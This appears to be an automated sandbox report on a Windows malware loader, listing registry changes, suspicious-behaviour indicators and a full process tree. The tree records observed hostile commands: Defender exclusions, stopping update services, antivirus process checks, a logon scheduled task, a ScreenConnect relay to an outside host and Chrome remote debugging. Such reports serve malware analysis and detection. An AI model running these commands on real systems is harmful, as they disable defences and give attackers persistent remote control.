651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Bjkm5hE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Bjkm5hE.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2892	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
592	35f030b7d73472a67a55161a98d37678.exe
2700	skotes.exe
1808	jonbDes.exe
1808	jonbDes.exe
1808	jonbDes.exe
1808	jonbDes.exe
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
2308	up7d8Ym.exe
2308	up7d8Ym.exe
2308	up7d8Ym.exe
2308	up7d8Ym.exe
800	012Bdpb.exe
1316	7fOMOTQ.exe
3024	Bjkm5hE.exe
2324	Macromedia.com
2324	Macromedia.com
1316	7fOMOTQ.exe
1316	7fOMOTQ.exe
1316	7fOMOTQ.exe
1316	7fOMOTQ.exe
1984	Fe36XBk.exe
3024	Bjkm5hE.exe
3024	Bjkm5hE.exe
1000	loqVSeJ.exe
532	chrome.exe
532	chrome.exe
3024	Bjkm5hE.exe
3024	Bjkm5hE.exe
1000	loqVSeJ.exe
3472	powershell.exe
1000	loqVSeJ.exe
2136	cABT5qY.exe
2136	cABT5qY.exe
2136	cABT5qY.exe
2136	cABT5qY.exe
1924	powershell.exe
2036	Ryu8yUx.exe
2036	Ryu8yUx.exe
2036	Ryu8yUx.exe
2036	Ryu8yUx.exe
3544	ViGgA8C.exe
2760	Ryu8yUx.exe
2760	Ryu8yUx.exe
2760	Ryu8yUx.exe
2760	Ryu8yUx.exe
3240	UN8QxIq.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2824	tasklist.exe
Token: SeDebugPrivilege	1824	tasklist.exe
Token: SeShutdownPrivilege	532	chrome.exe
Token: SeShutdownPrivilege	532	chrome.exe
Token: SeShutdownPrivilege	532	chrome.exe
Token: SeShutdownPrivilege	532	chrome.exe
Token: SeShutdownPrivilege	532	chrome.exe
Token: SeShutdownPrivilege	532	chrome.exe
Token: SeShutdownPrivilege	532	chrome.exe
Token: SeShutdownPrivilege	532	chrome.exe
Token: SeDebugPrivilege	1000	loqVSeJ.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	3680	5bzo1pz.exe
Token: SeShutdownPrivilege	3736	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3736	msiexec.exe
Token: SeRestorePrivilege	3768	msiexec.exe
Token: SeTakeOwnershipPrivilege	3768	msiexec.exe
Token: SeSecurityPrivilege	3768	msiexec.exe
Token: SeCreateTokenPrivilege	3736	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3736	msiexec.exe
Token: SeLockMemoryPrivilege	3736	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3736	msiexec.exe
Token: SeMachineAccountPrivilege	3736	msiexec.exe
Token: SeTcbPrivilege	3736	msiexec.exe
Token: SeSecurityPrivilege	3736	msiexec.exe
Token: SeTakeOwnershipPrivilege	3736	msiexec.exe
Token: SeLoadDriverPrivilege	3736	msiexec.exe
Token: SeSystemProfilePrivilege	3736	msiexec.exe
Token: SeSystemtimePrivilege	3736	msiexec.exe
Token: SeProfSingleProcessPrivilege	3736	msiexec.exe
Token: SeIncBasePriorityPrivilege	3736	msiexec.exe
Token: SeCreatePagefilePrivilege	3736	msiexec.exe
Token: SeCreatePermanentPrivilege	3736	msiexec.exe
Token: SeBackupPrivilege	3736	msiexec.exe
Token: SeRestorePrivilege	3736	msiexec.exe
Token: SeShutdownPrivilege	3736	msiexec.exe
Token: SeDebugPrivilege	3736	msiexec.exe
Token: SeAuditPrivilege	3736	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3736	msiexec.exe
Token: SeChangeNotifyPrivilege	3736	msiexec.exe
Token: SeRemoteShutdownPrivilege	3736	msiexec.exe
Token: SeUndockPrivilege	3736	msiexec.exe
Token: SeSyncAgentPrivilege	3736	msiexec.exe
Token: SeEnableDelegationPrivilege	3736	msiexec.exe
Token: SeManageVolumePrivilege	3736	msiexec.exe
Token: SeImpersonatePrivilege	3736	msiexec.exe
Token: SeCreateGlobalPrivilege	3736	msiexec.exe
Token: SeCreateTokenPrivilege	3736	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3736	msiexec.exe
Token: SeLockMemoryPrivilege	3736	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3736	msiexec.exe
Token: SeMachineAccountPrivilege	3736	msiexec.exe
Token: SeTcbPrivilege	3736	msiexec.exe
Token: SeSecurityPrivilege	3736	msiexec.exe
Token: SeTakeOwnershipPrivilege	3736	msiexec.exe
Token: SeLoadDriverPrivilege	3736	msiexec.exe
Token: SeSystemProfilePrivilege	3736	msiexec.exe
Token: SeSystemtimePrivilege	3736	msiexec.exe
Token: SeProfSingleProcessPrivilege	3736	msiexec.exe
Token: SeIncBasePriorityPrivilege	3736	msiexec.exe
Token: SeCreatePagefilePrivilege	3736	msiexec.exe
Token: SeCreatePermanentPrivilege	3736	msiexec.exe
Token: SeBackupPrivilege	3736	msiexec.exe
Token: SeRestorePrivilege	3736	msiexec.exe

Suspicious use of FindShellTrayWindow 39 IoCs

pid	Process
592	35f030b7d73472a67a55161a98d37678.exe
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
532	chrome.exe
3736	msiexec.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2324	Macromedia.com
2324	Macromedia.com
2324	Macromedia.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 592 wrote to memory of 2700	592	35f030b7d73472a67a55161a98d37678.exe	30
PID 592 wrote to memory of 2700	592	35f030b7d73472a67a55161a98d37678.exe	30
PID 592 wrote to memory of 2700	592	35f030b7d73472a67a55161a98d37678.exe	30
PID 592 wrote to memory of 2700	592	35f030b7d73472a67a55161a98d37678.exe	30
PID 2700 wrote to memory of 1144	2700	skotes.exe	33
PID 2700 wrote to memory of 1144	2700	skotes.exe	33
PID 2700 wrote to memory of 1144	2700	skotes.exe	33
PID 2700 wrote to memory of 1144	2700	skotes.exe	33
PID 2700 wrote to memory of 1808	2700	skotes.exe	34
PID 2700 wrote to memory of 1808	2700	skotes.exe	34
PID 2700 wrote to memory of 1808	2700	skotes.exe	34
PID 2700 wrote to memory of 1808	2700	skotes.exe	34
PID 2700 wrote to memory of 2372	2700	skotes.exe	36
PID 2700 wrote to memory of 2372	2700	skotes.exe	36
PID 2700 wrote to memory of 2372	2700	skotes.exe	36
PID 2700 wrote to memory of 2372	2700	skotes.exe	36
PID 2372 wrote to memory of 2492	2372	tYrnx75.exe	37
PID 2372 wrote to memory of 2492	2372	tYrnx75.exe	37
PID 2372 wrote to memory of 2492	2372	tYrnx75.exe	37
PID 2372 wrote to memory of 2492	2372	tYrnx75.exe	37
PID 2492 wrote to memory of 2824	2492	cmd.exe	39
PID 2492 wrote to memory of 2824	2492	cmd.exe	39
PID 2492 wrote to memory of 2824	2492	cmd.exe	39
PID 2492 wrote to memory of 2824	2492	cmd.exe	39
PID 2492 wrote to memory of 2800	2492	cmd.exe	40
PID 2492 wrote to memory of 2800	2492	cmd.exe	40
PID 2492 wrote to memory of 2800	2492	cmd.exe	40
PID 2492 wrote to memory of 2800	2492	cmd.exe	40
PID 2492 wrote to memory of 1824	2492	cmd.exe	41
PID 2492 wrote to memory of 1824	2492	cmd.exe	41
PID 2492 wrote to memory of 1824	2492	cmd.exe	41
PID 2492 wrote to memory of 1824	2492	cmd.exe	41
PID 2492 wrote to memory of 1984	2492	cmd.exe	42
PID 2492 wrote to memory of 1984	2492	cmd.exe	42
PID 2492 wrote to memory of 1984	2492	cmd.exe	42
PID 2492 wrote to memory of 1984	2492	cmd.exe	42
PID 2492 wrote to memory of 1640	2492	cmd.exe	43
PID 2492 wrote to memory of 1640	2492	cmd.exe	43
PID 2492 wrote to memory of 1640	2492	cmd.exe	43
PID 2492 wrote to memory of 1640	2492	cmd.exe	43
PID 2492 wrote to memory of 1272	2492	cmd.exe	44
PID 2492 wrote to memory of 1272	2492	cmd.exe	44
PID 2492 wrote to memory of 1272	2492	cmd.exe	44
PID 2492 wrote to memory of 1272	2492	cmd.exe	44
PID 2492 wrote to memory of 892	2492	cmd.exe	45
PID 2492 wrote to memory of 892	2492	cmd.exe	45
PID 2492 wrote to memory of 892	2492	cmd.exe	45
PID 2492 wrote to memory of 892	2492	cmd.exe	45
PID 2492 wrote to memory of 1812	2492	cmd.exe	46
PID 2492 wrote to memory of 1812	2492	cmd.exe	46
PID 2492 wrote to memory of 1812	2492	cmd.exe	46
PID 2492 wrote to memory of 1812	2492	cmd.exe	46
PID 2492 wrote to memory of 3068	2492	cmd.exe	47
PID 2492 wrote to memory of 3068	2492	cmd.exe	47
PID 2492 wrote to memory of 3068	2492	cmd.exe	47
PID 2492 wrote to memory of 3068	2492	cmd.exe	47
PID 2492 wrote to memory of 2324	2492	cmd.exe	48
PID 2492 wrote to memory of 2324	2492	cmd.exe	48
PID 2492 wrote to memory of 2324	2492	cmd.exe	48
PID 2492 wrote to memory of 2324	2492	cmd.exe	48
PID 2324 wrote to memory of 2892	2324	Macromedia.com	49
PID 2324 wrote to memory of 2892	2324	Macromedia.com	49
PID 2324 wrote to memory of 2892	2324	Macromedia.com	49
PID 2324 wrote to memory of 2892	2324	Macromedia.com	49

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:600
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:888
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:760
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    PID:2164
- - C:\Windows\system32\DrvInst.exe
    DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003E0" "000000000000053C"
    3⤵
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:2128
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:680
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:752
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:816
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1040
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:844
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:968
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:272
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1068
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1076
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1164
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1500
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:792
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2484
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
  2⤵
  PID:1464
- C:\Windows\system32\msiexec.exe
  C:\Windows\system32\msiexec.exe /V
  2⤵
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3768
- - C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding 57C4811CAAE15103D51549C032B2435E C
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3812
  - - C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI276E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259533262 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3924
- - C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding 96A7C75E29D4A589FB56A4DCB3337DFB
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3964
- - C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding ADF517A831DF3CF33B2699276F316300 M Global\MSI0000
    3⤵
    PID:5084
- C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  2⤵
  PID:2740
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k swprv
  2⤵
  PID:2412
- C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe
  C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe
  2⤵
  PID:1532
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4436
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:892
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4448
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4656
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4512
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:4816
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:4956
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:3800
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:4004
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1512
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2300
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2840
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:1356
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    PID:1960
- C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe
  "C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.ssahelponline.ru&p=443&s=9fe7623b-9bc2-44a1-b83c-0a48f2512116&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&c=mm&c=mm&c=mm&c=mm&c=&c=&c=&c="
  2⤵
  PID:4940
- - C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe
    "C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe" "RunRole" "3add1600-94c7-445a-8340-e928eee31170" "User"
    3⤵
    PID:2676

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:488

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:496

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1112
- C:\Users\Admin\AppData\Local\Temp\35f030b7d73472a67a55161a98d37678.exe
  "C:\Users\Admin\AppData\Local\Temp\35f030b7d73472a67a55161a98d37678.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:592
- - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2700
  - - C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
      "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:1144
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1664
  - - C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
      "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1808
  - - C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe
      "C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2372
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2492
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2824
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2800
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1824
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1984
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 764661
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1640
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Fm
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1272
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Tunnel" Addresses
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:892
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1812
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3068
      - C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.com
        
        Macromedia.com F
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2324
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2892
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        7⤵
        
        PID:2656
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 15
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3020
  - - C:\Users\Admin\AppData\Local\Temp\1065345001\up7d8Ym.exe
      "C:\Users\Admin\AppData\Local\Temp\1065345001\up7d8Ym.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:876
    - - C:\Users\Admin\AppData\Local\Temp\1065345001\up7d8Ym.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1065345001\up7d8Ym.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2308
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 516
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:336
  - - C:\Users\Admin\AppData\Local\Temp\1065531001\012Bdpb.exe
      "C:\Users\Admin\AppData\Local\Temp\1065531001\012Bdpb.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:800
  - - C:\Users\Admin\AppData\Local\Temp\1068334001\7fOMOTQ.exe
      "C:\Users\Admin\AppData\Local\Temp\1068334001\7fOMOTQ.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1316
  - - C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      PID:3024
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:532
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
